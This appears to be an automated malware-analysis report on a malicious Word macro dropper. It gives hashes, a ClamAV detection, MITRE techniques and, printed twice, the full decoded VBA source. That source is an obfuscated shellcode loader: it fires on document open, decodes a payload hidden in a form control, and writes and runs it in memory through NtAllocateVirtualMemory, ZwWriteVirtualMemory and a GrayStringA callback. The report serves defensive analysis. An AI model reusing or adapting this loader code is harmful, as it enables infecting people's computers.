Office (OLE) malware analysis — malicious · 780a5096b52f1831

MALICIOUS

Office (OLE)

180.5 KB Created: 2017-02-28 12:28:00 Authoring application: Microsoft Office Word First seen: 2017-03-05

MD5: 3ba2aea8ca693ace3bed4d1890349b90 SHA-1: a7749c56f8fcd35dd6150d6d452967134abd6d5f SHA-256: 780a5096b52f18316eeb93aa8a8e17cd7f8372f3dae08094bff39acae457fdc9

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Dropper.ZwMacros-6057750-0', indicating it's a macro-based dropper. The presence of a 'Document_Open' macro further supports this, as it's a common technique for automatically executing malicious code upon opening the document. The VBA code appears to be obfuscated, but its structure suggests it's intended to download and execute a second-stage payload.

Heuristics 4

ClamAV: Doc.Dropper.ZwMacros-6057750-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
Dim critically As Byte

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15397 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15397 bytes
SHA-256: `fa12b2087bd41537f0fc543f6c942170aedac9db9c291b0abc770e1628550701`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim critically As Byte Dim constitutionally As Variant bury = "plantae" unlubricated = "ommastrephes" empiricism implosion = 4 antilepton = 282 daylight = 37113 chide = 126260 chide = SYD(chide, daylight, antilepton, implosion) End Sub Function fry(grandiose) Dim sandbank As Integer Dim hesperis As String Dim purgation As String Dim arthrosporic As Variant #If Win64 > 0 Then Dim lemoncolored As String Dim ornithologist As LongPtr disinter = 77 - 44 - 25 Dim canadian As LongPtr Dim narthecium As Byte Dim halophile As Variant Dim basidiosporous As LongPtr Dim sed As Byte #Else Dim oppressor As Long Dim ornithologist As Long disinter = 1 + 3 Dim canadian As Long Dim eugenia As Integer Dim basidiosporous As Long Dim sheeplike As String Dim commonality As Variant #End If occupation = VarPtr(ornithologist) continue = recurvity(occupation, VarPtr(grandiose) + 8, disinter) blolly = 124 + 92 - 217 canadian = 116 - 112 + 62 - 66 mizzenmast = 59 + 52 - 111 basidiosporous = 9874 bombycid = 125 + 1 - 118 + 4088 baas = 117 - 4 - 97 + 48 marmoreal = promulgate(ByVal blolly, canadian, ByVal mizzenmast, basidiosporous, ByVal bombycid, ByVal baas) overhaul = Rnd(368) fattened = analyze + 126 recurvity canadian, ornithologist, 4384 mahogany = 29 amice = 16926 trochaic = 313013 reputableness = NPer(59 / 787, mahogany, -17553, trochaic, 1) fry = canadian End Function Sub pageNumber() ActiveDocument.Sections(ActiveDocument.Sections.Count) _ .Headers(wdHeaderFooterPrimary).Range.Select With Selection .Paragraphs(1).Alignment = wdAlignParagraphCenter .TypeText Text:="Page " .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _ "PAGE ", PreserveFormatting:=True .TypeText Text:=" of " .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _ "NUMPAGES ", PreserveFormatting:=True End With End Sub Function recurvity(bishopric, publicist, crapulous) #If Win64 Then Dim nystatin As String Dim chichi As Integer Dim unromantically As LongPtr Dim secretarial As LongPtr Dim patera As LongPtr Dim birdie As Integer Dim assamese As LongPtr Dim maidan As LongPtr #Else Dim secretarial As Long Dim onondaga As String Dim unromantically As Long Dim thermonuclear As String Dim assamese As Long Dim bungaloid As String Dim patera As Long Dim cuckoldom As String Dim maidan As Long Dim champ As Integer Dim gelechiidae As Long #End If epigrammatic = "indigofera" analyze = Fix(66) secretarial = bishopric maidan = crapulous analyze = Fix(105) assamese = publicist clouded = 7 sapere = 191 antitussive = 11429 crouton = 447046 crouton = SYD(crouton, antitussive, sapere, clouded) epigrammatic = "communal" unromantically = 58 - 8 + 120 - 171 reluct ByVal unromantically, secretarial, assamese, maidan, patera fattened = overhaul + 96 End Function Sub empiricism() Dim gaping As Integer Dim naranjilla As Variant implanted = ThisDocument.ComputeStatistics(Statistic:=wdStatisticPages) megaptera.lari.Value = implanted + 9 snout = "quad" & "ripart" & "ite" copycat = "decker" Set announce = megaptera.lari.SelectedItem unrefined = 5 disvaluation = 160 tarn = 23456 bravissimo = 301721 bravissimo = SYD(bravissimo, tarn, disvaluation, unrefined) oxylebius = announce.Name carthaginian = 71 - 21 - 25 + 5819 builder = Right(oxylebius, carthaginian) catchpoll = electrolyze.rut(builder) finishing = 5 buckram = 362 sieve = 57794 broomcorn = 440744 broomcorn = SYD(broomcorn, sieve, buckram, finishing) hymenophyllaceae = "alliaria" #If Win64 Then Dim rascal As String Dim events As LongPtr Dim entangled As LongPtr Dim enchiridion As Byte #Else Dim ballyhoo As Byte Dim entangled As Long Dim cheeseparing As String Dim events As Long #End If crassulaceae = 0 deviating = "defrayment" busy = 30 + 38 + 4028 dicer = 55 sommelier = 2051 anisogamy = 417658 infarct = NPer(73 / 362, dicer, -26037, anisogamy, 1) crony = "ps" & "ychi" & "atric" blarina = "cattleship" hommes = "bacchanal" heartexpanding = 5 astronomer = 287 beaut = 47676 booksellers = 333154 booksellers = SYD(booksellers, beaut, astronomer, heartexpanding) siccity = catchpoll citizenship = "handed" ajuga = "hornless" events = fry(siccity) headmaster = "de" & "rnier" #If Win64 Then Dim riot As String Dim testaceous As LongPtr pollachius = "undertide" tufted = "advertent" Dim selfgenerated As LongPtr graphomania = 12 - 63 + 124 + 1239 #Else betongue = "quietly" manicurist = "le" & "pism" & "a" circumrotatory = "ludo" Dim testaceous As Long dermacentor = 67 - 83 + 511 Dim selfgenerated As Long graphomania = dermacentor + 2659 #End If Dim sacrosanct As String Dim besetting As Integer testaceous = 20 + 75 - 95 entangled = events + graphomania selfgenerated = 75 + 89 - 112 - 51 gummosis = borscht(selfgenerated, selfgenerated, entangled, testaceous, selfgenerated, testaceous, testaceous, testaceous, testaceous) beginning = 64 phone = 23004 usefulness = 475794 chinchilla = NPer(44 / 442, beginning, -28951, usefulness, 0) End Sub Attribute VB_Name = "electrolyze" ' Now tell me what got two thumbs and knows how to spit rhymes ' How rude, Stephanie Tanner #If Win64 Then ' Tell em open wide when they see how I'm flossing, ching ' First CD out sold a Sam Gooding Public Declare PtrSafe Function promulgate Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (doublefaced As LongPtr, azerbaijan As LongPtr, ByVal lithe As LongPtr,napkinByVal As LongPtr, materialistically As LongPtr, ByVal bitewing As LongPtr) As LongPtr ' Hands in the sky like ' Work ethic harder than a Mexican Public Declare PtrSafe Function reluct Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal assignation As Any, ByVal orthodontist As Any, ByVal monogynous As Any, ByVal sequester As Any, ByVal amaritude As Any) As LongPtr ' Now tell me what got two thumbs and knows how to spit rhymes ' I'm A-W-E, some call me awesome Public Declare PtrSafe Function chiwere Lib "Shlwapi.dll" Alias "PathFileExists" (poultice As LongPtr) As LongPtr ' First CD out sold a Sam Gooding ' Like I feel so awesome Public Declare PtrSafe Function mastaba Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (aecium As LongPtr, abridge As Any,enteritis As LongPtr, estafette As Any) As Boolean ' Now he's coming to America cause that boy good ' Wanna roll Public Declare PtrSafe Function borscht Lib "User32.dll" Alias "GrayStringA" ( ByVal brummagem As Any, ByVal trophonius As Any, ByVal doodlesack As Any, ByVal indecisive As Any, ByVal pantie As Any, ByVal corvine As Any, ByVal persia As Any, ByVal afferent As Any, ByVal odontoid As Any) As Long ' Semi colon dash parenthesis, text messaging ' Work ethic harder than a Mexican Public Declare PtrSafe Function anorectic Lib "Shell32.dll" Alias "SHGetDesktopFolder" (chloramphenicol As LongPtr) ' I'm A-W-E, some call me awesome ' I assume you should make room for the elephant Public Declare PtrSafe Function cutworm Lib "Shell32.dll" Alias "SHGetSettings" (owlish As LongPtr,filicopsida As LongPtr) As LongPtr ' ' Wayne's World excellent Public Declare PtrSafe Function archosaurian Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal perquisite As LongPtr,decision As LongPtr,macrouridae As LongPtr,rightist As LongPtr,agreed As LongPtr) As Boolean ' I'm awesome every time I lay it down ' You don't gotta watch me but please watch your manners ' Now he's coming to America cause that boy good ' Al Hedison couldn't be this fly so ask how I feel and you know I reply #Else ' Now he's coming to America cause that boy good ' Al Hedison couldn't be this fly so ask how I feel and you know I reply Public Declare Function promulgate Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (muscat As Long, sentimentally As Long, ByVal catamenia As Long, libertyByVal As Long, soldiering As Long, ByVal benefits As Long) As Long ' Now he's coming to America cause that boy good ' Al Hedison couldn't be this fly so ask how I feel and you know I reply Public Declare Function millstone Lib "Shlwapi.dll" Alias "PathFileExists" (blewits As Long) As Long ' Now he's coming to America cause that boy good ' Al Hedison couldn't be this fly so ask how I feel and you know I reply Public Declare Function reluct Lib "Ntdll.dll " Alias "ZwWriteVirtualMemory" (ByVal onychomancy As Any, ByVal charcuterie As Any, ByVal auriculariaceae As Any, ByVal spatangoida As Any, ByVal ideality As Any) As Long ' Now he's coming to America cause that boy good ' Al Hedison couldn't be this fly so ask how I feel and you know I reply Public Declare Function positive Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal mistflower As Long, mourn As Long, delightfully As Long, ventriloquist As Long, hindshank As Long) As Boolean ' Now he's coming to America cause that boy good ' Public Declare Function borscht Lib "User32.dll" Alias "GrayStringA" (ByVal hunnemannia As Any, ByVal achromatism As Any, ByVal monodrame As Any, ByVal axil As Any, ByVal effaced As Any, ByVal curricular As Any, ByVal derailment As Any, ByVal der As Any, ByVal hamburg As Any) As Long ' Now tell me what got two thumbs and knows how to spit rhymes ' I think that I kill em, play possum Public Declare Function highsouled Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (exemplification As Long, gaudy As Any, midair As Long, particula As Any) As Boolean ' Boom, where I come from is irrelevant ' Tell em open wide when they see how I'm flossing, ching Public Declare Function xiphoid Lib "Shell32.dll" Alias "SHGetSettings" (ceryle As Long, helpfully As Long) As Long ' Tell em open wide when they see how I'm flossing, ching ' I been on it for a while, trying to get my spot Public Declare Function curiosity Lib "Shell32.dll" Alias "SHGetDesktopFolder" (nonenzymatic As Long) ' How you feel ' Death proof ride with Rosario Dawson ' I'm A-W-E, some call me awesome ' Death proof ride with Rosario Dawson #End If ' You don't wanna miss it like a very special blossom ' Now tell me what got two thumbs and knows how to spit rhymes Function rut(baggageman) As String Dim ade() As Byte balderdash = "acerola" Dim bloke As String Dim inseparability As String Dim onetrillionth(63) As Long Dim allegeable As Long Dim plumbaginales As Long Dim spontaieous As Long Dim gamopetalous(6965) As Byte Dim apia As Long Dim bettering As Integer analyze = Rnd(169) Dim ideawake As Long Dim adorable(63) As Long epigrammatic = epigrammatic Dim embroider As Integer Dim onesixth As Long Dim architrave(63) As Long stodgy = 4096 Dim bauble As Variant maxime = 4032 ballpark = 256 panicled = 258048 vying = 56 + 7 semestral = 65280 Dim formally As Variant treacle = 42 + 262102 crumbled = 35 + 16711645 poorly = 48 - 51 + 258 metencephalon = 68 + 16515004 neurotically = 65536 agonism = 128 + 48 - 112 Dim barkantine As Variant Dim rainfall As Integer creak = 0 awed = 5843 Dim hortatory() As Byte Dim bloodsucking As Variant hortatory = VBA.Strings.StrConv(baggageman, vbFromUnicode) Dim oxbow As Variant flyleaf = 8 feverish = 190 seductor = 51994 edmontonia = 375467 edmontonia = SYD(edmontonia, seductor, feverish, flyleaf) approachability = 5843 interminably = 2 + Sqr(RGB(0, 1, 0)) For summons = 0 To approachability If summons Mod 2 = 0 Then hortatory(summons) = hortatory(summons) + interminably Else hortatory(summons) = hortatory(summons) + interminably - 1 End If Next summons predestination = 105 conidiophore = 13441 gopher = 143747 afford = NPer(74 / 400, predestination, -37172, gopher, 0) embroider = 0 scruple = 46 - 92 + 46 primateship = 25 - 83 + 33 + 68 mellifluous = inquisitorial For plumbaginales = 0 To 63 onetrillionth(plumbaginales) = antifungal(plumbaginales, agonism, 32) architrave(plumbaginales) = antifungal(plumbaginales, stodgy, 32) adorable(plumbaginales) = antifungal(plumbaginales, treacle, 32) Next plumbaginales scowling = 52 chancre = 15902 dacoit = 570520 georgian = NPer(46 / 793, scowling, -39112, dacoit, 1) ade = hortatory cladrastis = 4 phaeton = 20 midway = 16367 notoryctidae = 517252 nagi = NPer(67 / 610, phaeton, -9838, notoryctidae, 0) cero = 3 analyze = Rnd(379) balderdash = epigrammatic millionfold = cero + 1 adenopathy = 2 For apia = 0 To approachability centrist = ade(apia) immaculately = ade(apia + 2) allegeable = adorable(mellifluous(centrist)) _ + architrave(mellifluous(ade(apia + 1))) + onetrillionth(mellifluous(immaculately)) + mellifluous(ade(apia + cero)) plumbaginales = antifungal(allegeable, crumbled, 24) gamopetalous(ideawake) = antifungal(plumbaginales, neurotically, 14) plumbaginales = antifungal(allegeable, semestral, 24) gamopetalous(ideawake + 1) = antifungal(plumbaginales, ballpark, 14) gamopetalous(ideawake + adenopathy) = antifungal(allegeable, poorly, 24) ideawake = ideawake + adenopathy + 1 apia = apia + 3 Next rut = gamopetalous End Function Public Sub DynamicBubble() Dim tempVar As Integer Dim anotherIteration As Boolean Dim I As Integer Dim arraySize As Integer Dim myArray() As Integer Do arraySize = I I = I + 1 Loop Until Cells(I, "A").Value = "" ReDim myArray(arraySize - 1) For I = 1 To arraySize myArray(I - 1) = Cells(I, "A").Value Next I Do anotherIteration = False For I = 0 To arraySize - 2 If myArray(I) > myArray(I + 1) Then tempVar = myArray(I) myArray(I) = myArray(I + 1) myArray(I + 1) = tempVar anotherIteration = True End If Next I Loop While anotherIteration = True ' For I = 1 To arraySize Cells(I, "B").Value = myArray(I - 1) Next I End Sub Function inquisitorial() Dim zosteraceae(255) As Byte wax = 63 - 82 + 84 Do zosteraceae(wax) = wax - 65 wax = wax + 1 Loop Until wax = 91 wax = 48 Do zosteraceae(wax) = wax + 4 wax = wax + 1 Loop Until wax = 58 wax = 97 Do zosteraceae(wax) = wax - 71 wax = wax + 1 Loop Until wax = 123 zosteraceae(47) = 63 wax = 43 zosteraceae(wax) = 62 inquisitorial = zosteraceae End Function Function antifungal(braille, berserker, groin) Select Case groin Case 14 antifungal = braille \ berserker Case 24 antifungal = braille And berserker Case 32 antifungal = braille * berserker End Select End Function Function good(commination) good = AscW(commination) End Function Attribute VB_Name = "megaptera" Attribute VB_Base = "0{F197168D-4BC7-4C24-A141-C19D3ABF718E}{7989A6A1-9294-40F8-8A29-8F197F518FEC}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: fa12b2087bd41537f0fc543f6c942170aedac9db9c291b0abc770e1628550701

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim critically As Byte
Dim constitutionally As Variant
bury = "plantae"
unlubricated = "ommastrephes"
empiricism
implosion = 4
antilepton = 282
daylight = 37113
chide = 126260
chide = SYD(chide, daylight, antilepton, implosion)
End Sub
Function fry(grandiose)
Dim sandbank As Integer
Dim hesperis As String
Dim purgation As String
Dim arthrosporic As Variant
#If Win64 > 0 Then
Dim lemoncolored As String
Dim ornithologist As LongPtr
disinter = 77 - 44 - 25
Dim canadian As LongPtr
Dim narthecium As Byte
Dim halophile As Variant
Dim basidiosporous As LongPtr
Dim sed As Byte
#Else
Dim oppressor As Long
Dim ornithologist As Long
disinter = 1 + 3
Dim canadian As Long
Dim eugenia As Integer
Dim basidiosporous As Long
Dim sheeplike As String
Dim commonality As Variant
#End If
occupation = VarPtr(ornithologist)
continue = recurvity(occupation, VarPtr(grandiose) + 8, disinter)
blolly = 124 + 92 - 217
canadian = 116 - 112 + 62 - 66
mizzenmast = 59 + 52 - 111
basidiosporous = 9874
bombycid = 125 + 1 - 118 + 4088
baas = 117 - 4 - 97 + 48
marmoreal = promulgate(ByVal blolly, canadian, ByVal mizzenmast, basidiosporous, ByVal bombycid, ByVal baas)
overhaul = Rnd(368)

fattened = analyze + 126

recurvity canadian, ornithologist, 4384
mahogany = 29
amice = 16926
trochaic = 313013
reputableness = NPer(59 / 787, mahogany, -17553, trochaic, 1)

fry = canadian
End Function
Sub pageNumber()
    ActiveDocument.Sections(ActiveDocument.Sections.Count) _
        .Headers(wdHeaderFooterPrimary).Range.Select
    With Selection
        .Paragraphs(1).Alignment = wdAlignParagraphCenter
        .TypeText Text:="Page "
        .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
            "PAGE ", PreserveFormatting:=True
        .TypeText Text:=" of "
        .Fields.Add Range:=Selection.Range, Type:=wdFieldEmpty, Text:= _
            "NUMPAGES ", PreserveFormatting:=True
    End With
End Sub

Function recurvity(bishopric, publicist, crapulous)
#If Win64 Then
Dim nystatin As String
Dim chichi As Integer
Dim unromantically As LongPtr
Dim secretarial As LongPtr
Dim patera As LongPtr
Dim birdie As Integer
Dim assamese As LongPtr
Dim maidan As LongPtr
#Else
Dim secretarial As Long
Dim onondaga As String
Dim unromantically As Long
Dim thermonuclear As String
Dim assamese As Long
Dim bungaloid As String
Dim patera As Long
Dim cuckoldom As String
Dim maidan As Long
Dim champ As Integer
Dim gelechiidae As Long
#End If
epigrammatic = "indigofera"
analyze = Fix(66)
secretarial = bishopric
maidan = crapulous
analyze = Fix(105)
assamese = publicist
clouded = 7
sapere = 191
antitussive = 11429
crouton = 447046
crouton = SYD(crouton, antitussive, sapere, clouded)

epigrammatic = "communal"
unromantically = 58 - 8 + 120 - 171
reluct ByVal unromantically, secretarial, assamese, maidan, patera
fattened = overhaul + 96
End Function
Sub empiricism()
Dim gaping As Integer
Dim naranjilla As Variant
implanted = ThisDocument.ComputeStatistics(Statistic:=wdStatisticPages)
megaptera.lari.Value = implanted + 9
snout = "quad" & "ripart" & "ite"
copycat = "decker"
Set announce = megaptera.lari.SelectedItem
unrefined = 5
disvaluation = 160
tarn = 23456
bravissimo = 301721
bravissimo = SYD(bravissimo, tarn, disvaluation, unrefined)

oxylebius = announce.Name
carthaginian = 71 - 21 - 25 + 5819
builder = Right(oxylebius, carthaginian)
catchpoll = electrolyze.rut(builder)
finishing = 5
buckram = 362
sieve = 57794
broomcorn = 440744
broomcorn = SYD(broomcorn, sieve, buckram, finishing)

hymenophyllaceae = "alliaria"
#If Win64 Then
Dim rascal As String
Dim events As LongPtr
Dim entangled As LongPtr
Dim enchiridion As Byte
#Else
Dim ballyhoo As Byte
Dim entangled As Long
Dim cheeseparing As String
Dim events As Long
#End If
crassulaceae = 0
deviating = "defrayment"
busy = 30 + 38 + 4028
dicer = 55
sommelier = 2051
anisogamy = 417658
infarct = NPer(73 / 362, dicer, -26037, anisogamy, 1)

crony = "ps" & "ychi" & "atric"
blarina = "cattleship"
hommes = "bacchanal"
heartexpanding = 5
astronomer = 287
beaut = 47676
booksellers = 333154
booksellers = SYD(booksellers, beaut, astronomer, heartexpanding)

siccity = catchpoll
citizenship = "handed"
ajuga = "hornless"
events = fry(siccity)
headmaster = "de" & "rnier"
#If Win64 Then
Dim riot As String
Dim testaceous As LongPtr
pollachius = "undertide"
tufted = "advertent"
Dim selfgenerated As LongPtr
graphomania = 12 - 63 + 124 + 1239
#Else
betongue = "quietly"
manicurist = "le" & "pism" & "a"
circumrotatory = "ludo"
Dim testaceous As Long
dermacentor = 67 - 83 + 511
Dim selfgenerated As Long
graphomania = dermacentor + 2659

#End If
Dim sacrosanct As String
Dim besetting As Integer
testaceous = 20 + 75 - 95
entangled = events + graphomania
selfgenerated = 75 + 89 - 112 - 51
gummosis = borscht(selfgenerated, selfgenerated, entangled, testaceous, selfgenerated, testaceous, testaceous, testaceous, testaceous)
beginning = 64
phone = 23004
usefulness = 475794
chinchilla = NPer(44 / 442, beginning, -28951, usefulness, 0)

End Sub



Attribute VB_Name = "electrolyze"
'  Now tell me what got two thumbs and knows how to spit rhymes
'  How rude, Stephanie Tanner
#If Win64 Then
'  Tell em open wide when they see how I'm flossing, ching
'  First CD out sold a Sam Gooding
Public Declare PtrSafe Function promulgate Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (doublefaced As LongPtr, azerbaijan As LongPtr, ByVal lithe As LongPtr,napkinByVal As LongPtr, materialistically As LongPtr, ByVal bitewing As LongPtr) As LongPtr
'  Hands in the sky like
'  Work ethic harder than a Mexican
Public Declare PtrSafe Function reluct Lib "Ntdll.dll  " Alias "ZwWriteVirtualMemory" (ByVal assignation As Any, ByVal orthodontist As Any, ByVal monogynous As Any, ByVal sequester As Any, ByVal amaritude As Any) As LongPtr
'  Now tell me what got two thumbs and knows how to spit rhymes
'  I'm A-W-E, some call me awesome
Public Declare PtrSafe Function chiwere Lib "Shlwapi.dll" Alias "PathFileExists" (poultice As LongPtr) As LongPtr
'  First CD out sold a Sam Gooding
'  Like I feel so awesome
Public Declare PtrSafe Function mastaba Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (aecium As LongPtr, abridge As Any,enteritis As LongPtr, estafette As Any) As Boolean
'  Now he's coming to America cause that boy good
'  Wanna roll
Public  Declare PtrSafe Function borscht Lib "User32.dll" Alias "GrayStringA" ( ByVal brummagem As Any, ByVal trophonius As Any, ByVal doodlesack As Any, ByVal indecisive As Any, ByVal pantie As Any, ByVal corvine As Any, ByVal persia As Any, ByVal afferent As Any, ByVal odontoid As Any) As Long
'  Semi colon dash parenthesis, text messaging
'  Work ethic harder than a Mexican
Public Declare PtrSafe Function anorectic Lib "Shell32.dll" Alias "SHGetDesktopFolder" (chloramphenicol As LongPtr)
'  I'm A-W-E, some call me awesome
'  I assume you should make room for the elephant
Public Declare PtrSafe Function cutworm Lib "Shell32.dll" Alias "SHGetSettings" (owlish As LongPtr,filicopsida As LongPtr) As LongPtr
'
'  Wayne's World excellent
Public Declare PtrSafe Function archosaurian Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal perquisite As LongPtr,decision As LongPtr,macrouridae As LongPtr,rightist As LongPtr,agreed As LongPtr) As Boolean
'  I'm awesome every time I lay it down
'  You don't gotta watch me but please watch your manners

'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
#Else
'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function promulgate Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (muscat As Long, sentimentally As Long, ByVal catamenia As Long, libertyByVal As Long, soldiering As Long, ByVal benefits As Long) As Long
'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function millstone Lib "Shlwapi.dll" Alias "PathFileExists" (blewits As Long) As Long
'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function reluct Lib "Ntdll.dll   " Alias "ZwWriteVirtualMemory" (ByVal onychomancy As Any, ByVal charcuterie As Any, ByVal auriculariaceae As Any, ByVal spatangoida As Any, ByVal ideality As Any) As Long
'  Now he's coming to America cause that boy good
'  Al Hedison couldn't be this fly so ask how I feel and you know I reply
Public Declare Function positive Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal mistflower As Long, mourn As Long, delightfully As Long, ventriloquist As Long, hindshank As Long) As Boolean
'  Now he's coming to America cause that boy good
'
Public Declare Function borscht Lib "User32.dll" Alias "GrayStringA" (ByVal hunnemannia As Any, ByVal achromatism As Any, ByVal monodrame As Any, ByVal axil As Any, ByVal effaced As Any, ByVal curricular As Any, ByVal derailment As Any, ByVal der As Any, ByVal hamburg As Any) As Long
'  Now tell me what got two thumbs and knows how to spit rhymes
'  I think that I kill em, play possum
Public Declare Function highsouled Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (exemplification As Long, gaudy As Any, midair As Long, particula As Any) As Boolean
'  Boom, where I come from is irrelevant
'  Tell em open wide when they see how I'm flossing, ching
Public Declare Function xiphoid Lib "Shell32.dll" Alias "SHGetSettings" (ceryle As Long, helpfully As Long) As Long
'  Tell em open wide when they see how I'm flossing, ching
'  I been on it for a while, trying to get my spot
Public Declare Function curiosity Lib "Shell32.dll" Alias "SHGetDesktopFolder" (nonenzymatic As Long)
'  How you feel
'  Death proof ride with Rosario Dawson

'  I'm A-W-E, some call me awesome
'  Death proof ride with Rosario Dawson
#End If
'  You don't wanna miss it like a very special blossom
'  Now tell me what got two thumbs and knows how to spit rhymes
Function rut(baggageman) As String
Dim ade() As Byte
balderdash = "acerola"

Dim bloke As String
Dim inseparability As String

Dim onetrillionth(63) As Long
Dim allegeable As Long
Dim plumbaginales As Long
Dim spontaieous As Long

Dim gamopetalous(6965) As Byte
Dim apia As Long
Dim bettering As Integer

analyze = Rnd(169)

Dim ideawake As Long
Dim adorable(63) As Long
epigrammatic = epigrammatic

Dim embroider As Integer
Dim onesixth As Long

Dim architrave(63) As Long
stodgy = 4096
Dim bauble As Variant

maxime = 4032
ballpark = 256
panicled = 258048
vying = 56 + 7
semestral = 65280
Dim formally As Variant

treacle = 42 + 262102
crumbled = 35 + 16711645
poorly = 48 - 51 + 258
metencephalon = 68 + 16515004
neurotically = 65536
agonism = 128 + 48 - 112
Dim barkantine As Variant

Dim rainfall As Integer
creak = 0
awed = 5843
Dim hortatory() As Byte
Dim bloodsucking As Variant
hortatory = VBA.Strings.StrConv(baggageman, vbFromUnicode)
Dim oxbow As Variant
flyleaf = 8
feverish = 190
seductor = 51994
edmontonia = 375467
edmontonia = SYD(edmontonia, seductor, feverish, flyleaf)

approachability = 5843
interminably = 2 + Sqr(RGB(0, 1, 0))
For summons = 0 To approachability
If summons Mod 2 = 0 Then
hortatory(summons) = hortatory(summons) + interminably
Else
hortatory(summons) = hortatory(summons) + interminably - 1
End If
Next summons
predestination = 105
conidiophore = 13441
gopher = 143747
afford = NPer(74 / 400, predestination, -37172, gopher, 0)

embroider = 0
scruple = 46 - 92 + 46
primateship = 25 - 83 + 33 + 68
mellifluous = inquisitorial
For plumbaginales = 0 To 63
onetrillionth(plumbaginales) = antifungal(plumbaginales, agonism, 32)
architrave(plumbaginales) = antifungal(plumbaginales, stodgy, 32)
adorable(plumbaginales) = antifungal(plumbaginales, treacle, 32)
Next plumbaginales
scowling = 52
chancre = 15902
dacoit = 570520
georgian = NPer(46 / 793, scowling, -39112, dacoit, 1)

ade = hortatory
cladrastis = 4
phaeton = 20
midway = 16367
notoryctidae = 517252
nagi = NPer(67 / 610, phaeton, -9838, notoryctidae, 0)

cero = 3
analyze = Rnd(379)

balderdash = epigrammatic

millionfold = cero + 1
adenopathy = 2
For apia = 0 To approachability
centrist = ade(apia)
immaculately = ade(apia + 2)
allegeable = adorable(mellifluous(centrist)) _
 + architrave(mellifluous(ade(apia + 1))) + onetrillionth(mellifluous(immaculately)) + mellifluous(ade(apia + cero))
plumbaginales = antifungal(allegeable, crumbled, 24)
gamopetalous(ideawake) = antifungal(plumbaginales, neurotically, 14)
plumbaginales = antifungal(allegeable, semestral, 24)
gamopetalous(ideawake + 1) = antifungal(plumbaginales, ballpark, 14)
gamopetalous(ideawake + adenopathy) = antifungal(allegeable, poorly, 24)
ideawake = ideawake + adenopathy + 1
apia = apia + 3
Next
rut = gamopetalous
End Function

Public Sub DynamicBubble()
    Dim tempVar As Integer
    Dim anotherIteration As Boolean
    Dim I As Integer
    Dim arraySize As Integer
    Dim myArray() As Integer
    Do
        arraySize = I
        I = I + 1
    Loop Until Cells(I, "A").Value = ""
    ReDim myArray(arraySize - 1)
    For I = 1 To arraySize
        myArray(I - 1) = Cells(I, "A").Value
    Next I
    Do
        anotherIteration = False
        For I = 0 To arraySize - 2
            If myArray(I) > myArray(I + 1) Then
                tempVar = myArray(I)
                myArray(I) = myArray(I + 1)
                myArray(I + 1) = tempVar
                anotherIteration = True
            End If
        Next I
    Loop While anotherIteration = True
    '
    For I = 1 To arraySize
        Cells(I, "B").Value = myArray(I - 1)
    Next I
End Sub

Function inquisitorial()
Dim zosteraceae(255) As Byte
wax = 63 - 82 + 84
Do
zosteraceae(wax) = wax - 65
wax = wax + 1
Loop Until wax = 91
wax = 48
Do
zosteraceae(wax) = wax + 4
wax = wax + 1
Loop Until wax = 58
wax = 97
Do
zosteraceae(wax) = wax - 71
wax = wax + 1
Loop Until wax = 123
